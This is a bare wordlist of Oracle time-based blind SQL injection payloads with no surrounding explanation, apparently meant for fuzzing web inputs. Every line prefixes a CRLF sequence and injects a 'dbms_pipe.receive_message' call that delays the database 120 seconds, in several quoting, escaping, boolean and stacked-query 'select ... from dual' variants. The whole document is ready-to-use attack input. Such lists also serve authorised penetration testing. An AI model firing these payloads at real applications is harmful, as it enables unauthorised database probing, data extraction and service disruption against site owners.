\r\n and 1337=dbms_pipe.receive_message(('a'),120)
\r\n and 1337=dbms_pipe.receive_message(('a'),120) -- 
\r\n and 1337=dbms_pipe.receive_message((\'a\'),120)
\r\n and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\r\n and 1337=dbms_pipe.receive_message(1,120)
\r\n and 1337=dbms_pipe.receive_message(1,120) -- 
\r\n or 1337=dbms_pipe.receive_message(('a'),120)
\r\n or 1337=dbms_pipe.receive_message(('a'),120) -- 
\r\n or 1337=dbms_pipe.receive_message((\'a\'),120)
\r\n or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\r\n or 1337=dbms_pipe.receive_message(1,120)
\r\n or 1337=dbms_pipe.receive_message(1,120) -- 
\r\n' and 1337=dbms_pipe.receive_message(('a'),120) -- 
\r\n' and 1337=dbms_pipe.receive_message(1,120) -- 
\r\n' or 1337=dbms_pipe.receive_message(('a'),120) -- 
\r\n' or 1337=dbms_pipe.receive_message(1,120) -- 
\r\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
\r\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\r\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
\r\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
\r\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
\r\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\r\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
\r\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
\r\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
\r\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\r\n\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\r\n\' and 1337=dbms_pipe.receive_message(1,120) -- 
\r\n\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\r\n\' or 1337=dbms_pipe.receive_message(1,120) -- 
\r\n\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
\r\n\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
